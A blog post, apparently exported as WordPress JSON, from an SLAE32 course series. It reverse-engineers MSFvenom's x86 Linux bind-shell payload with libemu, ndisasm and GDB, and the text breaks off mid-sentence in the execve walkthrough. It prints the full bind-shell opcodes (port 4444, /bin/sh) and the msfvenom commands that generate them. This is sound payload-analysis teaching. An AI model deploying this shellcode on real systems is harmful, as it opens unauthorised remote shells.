{"id":284,"date":"2022-05-15T20:52:56","date_gmt":"2022-05-15T20:52:56","guid":{"rendered":"https:\/\/jacklgmcbride.co.uk\/blog\/?p=284"},"modified":"2023-10-06T13:00:11","modified_gmt":"2023-10-06T13:00:11","slug":"slae32-assignment-5-msfvenom-shellcode-analysis","status":"publish","type":"post","link":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/2022\/05\/15\/slae32-assignment-5-msfvenom-shellcode-analysis\/","title":{"rendered":"SLAE32 Assignment #5: MSFvenom Shellcode Analysis"},"content":{"rendered":"\n<p>In this blog post, we will be covering our process behind reverse engineering and understanding popular shellcode payloads maintained in the payload module of the <a href=\"https:\/\/www.metasploit.com\/\">Metasploit<\/a> project, <a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/msfvenom\/\">MSFvenom<\/a>.<\/p>\n\n\n\n<p>As this blog series is based on x86 Linux, this post will focus on payloads supporting this architecture and platform.<\/p>\n\n\n\n<p>This post is the fifth entry in the series of posts created for the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SLAE32<\/a> certification course provided by Pentester Academy.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Overview<\/h2>\n\n\n\n<p>MSFvenom, which was previously separated into the submodules <strong>Msfpayload<\/strong> and <strong>Msfencode<\/strong> is used to generate shellcode payloads for multiple platforms and architectures.<\/p>\n\n\n\n<p>The module supports a range of capabilities such as encoding, various platform and architecture support, and options for outputting shellcode in custom formats, such as for high level loaders written in C# and Python.<\/p>\n\n\n\n<p>To list the available MSFvenom shellcode payloads for x86 Linux, we can run the following command:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 
5: MSFvenom Shellcode Analysis]\n\u2514\u2500# msfvenom -l payloads --platform linux --arch x86\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220502165337.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>In this blog post, we will be analysing three unique x86 Linux shellcode payloads created using MSFVenom. Our chosen shellcodes are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Shellcode 1: linux\/x86\/shell_bind_tcp<\/li>\n\n\n\n<li>Shellcode 2: linux\/x86\/adduser<\/li>\n\n\n\n<li>Shellcode 3: linux\/x86\/chmod<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Analysis Tools<\/h2>\n\n\n\n<p>Whilst we have popular frameworks such as Metasploit to generate shellcode which we know we can trust, it is helpful to know exactly what actions a given shellcode payload performs at an assembly level. To this end, it is recommended to perform analysis using the many available tools at our disposal.<\/p>\n\n\n\n<p>In this blog post, we will be covering the use of three core tools to disassemble, analyse and dissect the functionality of our chosen shellcodes. 
These tools are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Libemu<\/li>\n\n\n\n<li>Ndisasm<\/li>\n\n\n\n<li>GDB<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Libemu<\/h3>\n\n\n\n<p><a href=\"https:\/\/github.com\/buffer\/libemu\">Libemu<\/a> is an x86 shellcode detection and emulation tool.<\/p>\n\n\n\n<p>In this blog post, we will mostly stick to using the <strong>sctest<\/strong> program which is compiled as part of Libemu.<\/p>\n\n\n\n<p>To assist with installation of libemu, a helpful guide is provided by Ray Doyle on his <a href=\"https:\/\/www.doyler.net\/security-not-included\/libemu-installation\">blog<\/a>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Ndisasm<\/h3>\n\n\n\n<p><a href=\"https:\/\/linux.die.net\/man\/1\/ndisasm\">Ndisasm<\/a> is a disassembler for 16 and 32-bit binary files. Ndisasm is included as part of standard Linux package managers. In our case, we install this using <strong>apt<\/strong> as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\napt install ndisasm\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">GDB<\/h3>\n\n\n\n<p><a href=\"https:\/\/www.sourceware.org\/gdb\/\">GDB<\/a> is a debugging and reverse engineering program used to examine binaries. 
We will be using this with the <a href=\"https:\/\/github.com\/longld\/peda\">PEDA<\/a> plugin.<\/p>\n\n\n\n<p>We begin with an analysis of the MSFvenom <strong>linux\/x86\/shell_bind_tcp<\/strong> shellcode.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 1: linux\/x86\/shell_bind_tcp<\/h2>\n\n\n\n<p>The purpose of a bind shell payload is to open and bind a socket on the target machine, listen for an incoming connection and spawn an interactive command shell.<\/p>\n\n\n\n<p>To validate that this is the true functionality of the shellcode, we will carry out static and dynamic analysis in the next section.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Emulation with Libemu<\/h3>\n\n\n\n<p>To begin, we use the <strong>sctest<\/strong> program from Libemu to emulate the <strong>linux\/x86\/shell_bind_tcp<\/strong> shellcode. We supply the arguments as follows:<\/p>\n\n\n\n<p><strong>msfvenom<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-p<\/strong>: Payload option set to linux\/x86\/shell_bind_tcp<\/li>\n\n\n\n<li><strong>R<\/strong>: Output shellcode in raw bytes<\/li>\n<\/ul>\n\n\n\n<p><strong>sctest<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-vvv<\/strong>: Set verbosity mode to 3.<\/li>\n\n\n\n<li><strong>-S<\/strong>: Read shellcode from stdin<\/li>\n\n\n\n<li><strong>-s<\/strong>: Run for 10,000 steps<\/li>\n\n\n\n<li><strong>-G<\/strong>: Save graphical output<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/shell_bind_tcp R | .\/sctest -vvv -Ss 10000 -G shell_bind_tcp.dot\n<\/pre><\/div>\n\n\n<p>Whilst the output of this command may at first be quite difficult to make sense of, the end of the command output shows a sort of 'pseudocode' rendition of a bind 
shell.<\/p>\n\n\n\n<p>Below, code resembling C is shown to be setting up the four main syscalls to <strong>socket<\/strong>, <strong>bind<\/strong>, <strong>listen<\/strong> and <strong>accept<\/strong> to initiate the bind shell connection. This is followed by calls to <strong>dup2<\/strong> which are used to redirect STDIN, STDOUT and STDERR to the established bind socket. Finally, the call to <strong>execve<\/strong> is made, which initiates the \/bin\/sh shell.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\nint socket (\n     int domain = 2;\n     int type = 1;\n     int protocol = 0;\n) =  14;\nint bind (\n     int sockfd = 14;\n     struct sockaddr_in * my_addr = 0x00416fc2 =&gt; \n         struct   = {\n             short sin_family = 2;\n             unsigned short sin_port = 23569 (port=4444);\n             struct in_addr sin_addr = {\n                 unsigned long s_addr = 0 (host=0.0.0.0);\n             };\n             char sin_zero = &quot;       &quot;;\n         };\n     int addrlen = 16;\n) =  0;\nint listen (\n     int s = 14;\n     int backlog = 0;\n) =  0;\nint accept (\n     int sockfd = 14;\n     sockaddr_in * addr = 0x00000000 =&gt; \n         none;\n     int addrlen = 0x00000010 =&gt; \n         none;\n) =  19;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 14;\n) =  14;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 13;\n) =  13;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 12;\n) =  12;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 11;\n) =  11;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 10;\n) =  10;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 9;\n) =  9;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 8;\n) =  8;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 7;\n) =  7;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 6;\n) =  6;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 5;\n) =  5;\nint dup2 (\n     int 
oldfd = 19;\n     int newfd = 4;\n) =  4;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 3;\n) =  3;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 2;\n) =  2;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 1;\n) =  1;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 0;\n) =  0;\nint execve (\n     const char * dateiname = 0x00416fb2 =&gt; \n           = &quot;\/bin\/\/sh&quot;;\n     const char * argv&#x5B;] = &#x5B;\n           = 0x00416faa =&gt; \n               = 0x00416fb2 =&gt; \n                   = &quot;\/bin\/\/sh&quot;;\n           = 0x00000000 =&gt; \n             none;\n     ];\n     const char * envp&#x5B;] = 0x00000000 =&gt; \n         none;\n) =  0;\n<\/pre><\/div>\n\n\n<p>From the above, we can infer each syscall including the arguments used. From here, we can find out more information about each syscall by using the Linux man pages.<\/p>\n\n\n\n<p>Below are the function headers of each syscall which we have taken from the Libemu output:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint socket(int domain, int type, int protocol);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint listen(int sockfd, int backlog);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint dup2(int oldfd, int newfd);\n<\/pre><\/div>\n\n<div 
class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint execve(const char *pathname, char *const argv&#x5B;], char *const envp&#x5B;]);\n<\/pre><\/div>\n\n\n<p>The above function headers are enough for us to start recreating the bind shell payload in assembly.<\/p>\n\n\n\n<p>As we have used the <strong>-G<\/strong> option with Libemu, the above information is also presented graphically in the file <strong>shell_bind_tcp.dot<\/strong>. To view this file, we first convert it to a PNG using the <strong>dot<\/strong> command below.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ndot shell_bind_tcp.dot -T png -o shell_bind_tcp.png\n<\/pre><\/div>\n\n\n<p>In the image below, we can clearly see the calls made to each syscall and understand the corresponding assembly instructions.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/shell_bind_tcp.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Disassembly with Ndisasm<\/h3>\n\n\n\n<p>To complement the graphical output provided by Libemu, we can next use ndisasm to disassemble the payload into its assembly instructions:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/shell_bind_tcp R | ndisasm -u -\n\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 78 bytes\n\n00000000  31DB              xor ebx,ebx\n00000002  F7E3              mul ebx\n00000004  53                push ebx\n00000005  43                inc 
ebx\n00000006  53                push ebx\n00000007  6A02              push byte +0x2\n00000009  89E1              mov ecx,esp\n0000000B  B066              mov al,0x66\n0000000D  CD80              int 0x80\n0000000F  5B                pop ebx\n00000010  5E                pop esi\n00000011  52                push edx\n00000012  680200115C        push dword 0x5c110002\n00000017  6A10              push byte +0x10\n00000019  51                push ecx\n0000001A  50                push eax\n0000001B  89E1              mov ecx,esp\n0000001D  6A66              push byte +0x66\n0000001F  58                pop eax\n00000020  CD80              int 0x80\n00000022  894104            mov &#x5B;ecx+0x4],eax\n00000025  B304              mov bl,0x4\n00000027  B066              mov al,0x66\n00000029  CD80              int 0x80\n0000002B  43                inc ebx\n0000002C  B066              mov al,0x66\n0000002E  CD80              int 0x80\n00000030  93                xchg eax,ebx\n00000031  59                pop ecx\n00000032  6A3F              push byte +0x3f\n00000034  58                pop eax\n00000035  CD80              int 0x80\n00000037  49                dec ecx\n00000038  79F8              jns 0x32\n0000003A  682F2F7368        push dword 0x68732f2f\n0000003F  682F62696E        push dword 0x6e69622f\n00000044  89E3              mov ebx,esp\n00000046  50                push eax\n00000047  53                push ebx\n00000048  89E1              mov ecx,esp\n0000004A  B00B              mov al,0xb\n0000004C  CD80              int 0x80\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503074312.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This output gives us the assembly instructions used to recreate the payload.<\/p>\n\n\n\n<p>Next, we break down the above assembly instructions per syscall.<\/p>\n\n\n\n<hr class=\"wp-block-separator 
has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">socket<\/h4>\n\n\n\n<p>To begin, the assembly code creates a socket to establish connections over.<\/p>\n\n\n\n<p>The function header for the call to <strong>socket<\/strong> is as follows.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nint socket(int domain, int type, int protocol);\n<\/pre><\/div>\n\n\n<p>The assembly code for the call to <strong>socket<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n00000000  31DB              xor ebx,ebx\n00000002  F7E3              mul ebx\n00000004  53                push ebx\n00000005  43                inc ebx\n00000006  53                push ebx\n00000007  6A02              push byte +0x2\n00000009  89E1              mov ecx,esp\n0000000B  B066              mov al,0x66\n0000000D  CD80              int 0x80\n<\/pre><\/div>\n\n\n<p>To begin, the <strong>EBX<\/strong>, <strong>EAX<\/strong> and <strong>EDX<\/strong> registers are set to null. This is done by first <strong>XOR<\/strong>ing <strong>EBX<\/strong>, and then using the <strong>mul<\/strong> instruction, which multiplies <strong>EAX<\/strong> by <strong>EBX<\/strong>, implicitly setting <strong>EDX<\/strong> to null.<\/p>\n\n\n\n<p>Next, <strong>EBX<\/strong> (<strong>0<\/strong>) is pushed to the stack, incremented by <strong>1<\/strong>, and pushed to the stack again. After this, <strong>0x2<\/strong> is pushed to the stack. This sets the arguments for <strong>socket<\/strong> as follows:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>domain - 2<\/li>\n\n\n\n<li>type - 1<\/li>\n\n\n\n<li>protocol - 0<\/li>\n<\/ul>\n\n\n\n<p>Once they are set, the <strong>ESP<\/strong> register is moved into <strong>ECX<\/strong>, which is used to store the arguments for the syscall. 
Next, the syscall number (<strong>0x66<\/strong>) for <strong>socketcall<\/strong> is moved into <strong>AL<\/strong>, and the soft interrupt (<strong>int 0x80<\/strong>) is called, initiating the syscall for <strong>socket<\/strong>.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>socket<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>0x1<\/td><\/tr><tr><td>socket<\/td><td>domain<\/td><td>0x2<\/td><\/tr><tr><td>socket<\/td><td>type<\/td><td>0x1<\/td><\/tr><tr><td>socket<\/td><td>protocol<\/td><td>0x0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">bind<\/h4>\n\n\n\n<p>Next, the <strong>bind<\/strong> syscall is used to associate the socket to an address, port and protocol family.<\/p>\n\n\n\n<p>The function header for the call to <strong>bind<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\n<\/pre><\/div>\n\n\n<p>The assembly code for the call to <strong>bind<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n0000000F  5B                pop ebx\n00000010  5E                pop esi\n00000011  52                push edx\n00000012  680200115C        push dword 0x5c110002\n00000017  6A10              push byte +0x10\n00000019  51                push ecx\n0000001A  50                push eax\n0000001B  89E1              mov ecx,esp\n0000001D  6A66              push byte +0x66\n0000001F  58                pop eax\n00000020  CD80              int 
0x80\n<\/pre><\/div>\n\n\n<p>Following the above assembly code, the bind syscall is structured as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>-<\/td><\/tr><tr><td>bind<\/td><td>sockfd<\/td><td>File descriptor of the socket<\/td><td>host_sockid<\/td><\/tr><tr><td>bind<\/td><td>addr<\/td><td>Socket address family, host address and port<\/td><td>&amp;hostaddr<\/td><\/tr><tr><td>bind<\/td><td>addrlen<\/td><td>Size in bytes of address structure pointed to by addr<\/td><td>sizeof(hostaddr)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>To begin, the last value pushed to the stack, which was <strong>0x2<\/strong> for the <strong>domain<\/strong> argument of the call to <strong>socket<\/strong>, is popped into <strong>EBX<\/strong>. The next value on the stack, <strong>0x1<\/strong>, is then popped into <strong>ESI<\/strong>.<\/p>\n\n\n\n<p>Next, the <strong>sockaddr_in<\/strong> structure is pushed to the stack.<\/p>\n\n\n\n<p>The breakdown of this struct is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Struct<\/th><th>Argument<\/th><th>Man Reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>sockaddr_in<\/td><td>sin_family<\/td><td>Address family<\/td><td>AF_INET - 2<\/td><\/tr><tr><td>sockaddr_in<\/td><td>sin_port<\/td><td>TCP port to listen on in network byte order<\/td><td>4444 - 0x5c11<\/td><\/tr><tr><td>sockaddr_in<\/td><td>sin_addr<\/td><td>Host IP address in network byte order<\/td><td>INADDR_ANY - 0x00000000<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>To begin, the <strong>EDX<\/strong> register, which contains null, is pushed to the stack, supplying the <strong>sin_addr<\/strong> value. Next, a <strong>dword<\/strong> value containing the socket address family (<strong>2<\/strong>) and port (<strong>4444<\/strong> or <strong>0x5c11<\/strong>) is pushed to the stack. Then the value <strong>0x10<\/strong> for the <strong>addrlen<\/strong> argument is pushed to the stack, followed by the <strong>ECX<\/strong> register, which points to the start of the <strong>sockaddr_in<\/strong> structure.<\/p>\n\n\n\n<p>After that, the <strong>EAX<\/strong> register, which contains the <strong>sockfd<\/strong> value returned from the <strong>socket<\/strong> syscall, is pushed to the stack.<\/p>\n\n\n\n<p>Once the <strong>bind<\/strong> arguments are set, the <strong>ESP<\/strong> stack pointer is moved into <strong>ECX<\/strong>, which now points to their location on the stack. 
Next, the syscall number (<strong>0x66<\/strong>) for <strong>socketcall<\/strong> is moved into <strong>AL<\/strong>, and the soft interrupt (<strong>int 0x80<\/strong>) is called, initiating the syscall for <strong>bind<\/strong>.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>bind<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Description<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall number<\/td><td>syscall value for socketcall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>socketcall value for bind<\/td><td>0x2<\/td><\/tr><tr><td>bind<\/td><td>sockfd<\/td><td>socket file descriptor<\/td><td>0x3<\/td><\/tr><tr><td>bind<\/td><td>addr<\/td><td>sockaddr_in structure<\/td><td>2, 0x5c11, NULL<\/td><\/tr><tr><td>bind<\/td><td>addrlen<\/td><td>Length of addr in bytes<\/td><td>0x10<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">listen<\/h4>\n\n\n\n<p>Next, we look at the implementation of the <strong>listen<\/strong> call, which is used to listen for connections made to the previously created socket.<\/p>\n\n\n\n<p>The function header for the call to <strong>listen<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint listen(int sockfd, int backlog);\n<\/pre><\/div>\n\n\n<p>The assembly code for the call to <strong>listen<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n00000022  894104            mov &#x5B;ecx+0x4],eax\n00000025  B304              mov bl,0x4\n00000027  B066              mov al,0x66\n00000029  CD80              int 0x80\n<\/pre><\/div>\n\n\n<p>To begin, the value <strong>0x4<\/strong> is moved into <strong>BL<\/strong> for the socketcall <strong>call<\/strong> argument. Next, the <strong>0x66<\/strong> syscall value for <strong>socketcall<\/strong> is moved into <strong>EAX<\/strong> and the soft interrupt (<strong>int 0x80<\/strong>) is made.<\/p>\n\n\n\n<p>At the time this is called, the <strong>ECX<\/strong> register is pointing to the previously pushed <strong>sockfd<\/strong> value and a <strong>backlog<\/strong> value set to 0.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>listen<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>-<\/td><\/tr><tr><td>listen<\/td><td>sockfd<\/td><td>File descriptor of the socket<\/td><td>host_sockid<\/td><\/tr><tr><td>listen<\/td><td>backlog<\/td><td>Maximum number of pending connections<\/td><td>2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">accept<\/h4>\n\n\n\n<p>Next, we look at the call to the <strong>accept<\/strong> function, which is used to accept a connection request made by a client.<\/p>\n\n\n\n<p>The function header for <strong>accept<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\n<\/pre><\/div>\n\n\n<p>The assembly code for the call to <strong>accept<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n0000002B  43                inc ebx\n0000002C  B066              mov al,0x66\n0000002E  CD80              int 0x80\n<\/pre><\/div>\n\n\n<p>The call to <strong>accept<\/strong> is made next. As most of the address structure is populated by the OS based on the incoming connection, the required assembly instructions are minimal. Namely, the <strong>addr<\/strong> and <strong>addrlen<\/strong> arguments do not have to be provided by the programmer.<\/p>\n\n\n\n<p>The <strong>sockfd<\/strong> value, which <strong>ECX<\/strong> already points to as of the call to <strong>listen<\/strong>, is already set correctly for the <strong>accept<\/strong> call. As a result, all that is needed is to move the socketcall number for <strong>accept<\/strong> (<strong>0x5<\/strong>) into <strong>EBX<\/strong> by incrementing it, and then to make the syscall.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>accept<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>-<\/td><\/tr><tr><td>accept<\/td><td>sockfd<\/td><td>File descriptor that refers to a socket of type SOCK_STREAM<\/td><td>host_sockid<\/td><\/tr><tr><td>accept<\/td><td>addr<\/td><td>Pointer to the incoming socket's sockaddr structure<\/td><td>NULL<\/td><\/tr><tr><td>accept<\/td><td>addrlen<\/td><td>Size in bytes of the incoming socket's sockaddr structure<\/td><td>NULL<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">dup2<\/h4>\n\n\n\n<p>Next, we look at the implementation of <strong>dup2<\/strong>, which is used to redirect STDIN, STDOUT and STDERR to the connecting socket.<\/p>\n\n\n\n<p>The function header for <strong>dup2<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint dup2(int oldfd, int newfd);\n<\/pre><\/div>\n\n\n<p>The assembly code for the syscall to <strong>dup2<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n00000030  93                xchg eax,ebx\n00000031  59                pop ecx\n00000032  6A3F              push byte +0x3f\n00000034  58                pop eax\n00000035  CD80              int 0x80\n00000037  49                dec ecx\n00000038  79F8              jns 0x32\n<\/pre><\/div>\n\n\n<p>First, the <strong>xchg<\/strong> instruction swaps the values of <strong>EAX<\/strong> and <strong>EBX<\/strong>, which places the client socket descriptor returned by <strong>accept<\/strong> in <strong>EBX<\/strong> as the <strong>oldfd<\/strong> argument. The value at the top of the stack, which is the <strong>sockfd<\/strong> value pushed before the call to <strong>bind<\/strong>, is popped into <strong>ECX<\/strong>. Next, the syscall value for <strong>dup2<\/strong> (<strong>0x3f<\/strong>) is popped into <strong>EAX<\/strong> and the syscall is made.<\/p>\n\n\n\n<p>There are two additional instructions after the syscall is made, <strong>dec ECX<\/strong> and <strong>jns 0x32<\/strong>. The <strong>jns<\/strong>, or '<strong>Jump Not Sign<\/strong>', instruction jumps to the specified address if the sign flag is not set. The sign flag is set following an operation that results in a negative number.<\/p>\n\n\n\n<p>The final two instructions create a loop which, upon each syscall to <strong>dup2<\/strong>, decrements the value of <strong>ECX<\/strong> storing <strong>newfd<\/strong>. 
This value is the new file descriptor, and will be set to 2, 1 and 0 to redirect STDERR, STDOUT and STDIN respectively to the established socket.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>dup2<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>dup2<\/td><td>oldfd<\/td><td>File descriptor that refers to a socket of type SOCK_STREAM<\/td><td>host_sockid<\/td><\/tr><tr><td>dup2<\/td><td>newfd<\/td><td>New file descriptor<\/td><td>0, 1 and 2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">execve<\/h4>\n\n\n\n<p>Finally, there is the call to <strong>execve<\/strong>, which is responsible for executing a given program.<\/p>\n\n\n\n<p>The function header for <strong>execve<\/strong> is defined as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint execve(const char *pathname, char *const argv&#x5B;], char *const envp&#x5B;]);\n<\/pre><\/div>\n\n\n<p>The assembly code for the syscall to <strong>execve<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n0000003A  682F2F7368        push dword 0x68732f2f\n0000003F  682F62696E        push dword 0x6e69622f\n00000044  89E3              mov ebx,esp\n00000046  50                push eax\n00000047  53                push ebx\n00000048  89E1              mov ecx,esp\n0000004A  B00B              mov al,0xb\n0000004C  CD80              int 0x80\n<\/pre><\/div>\n\n\n<p>To begin, the 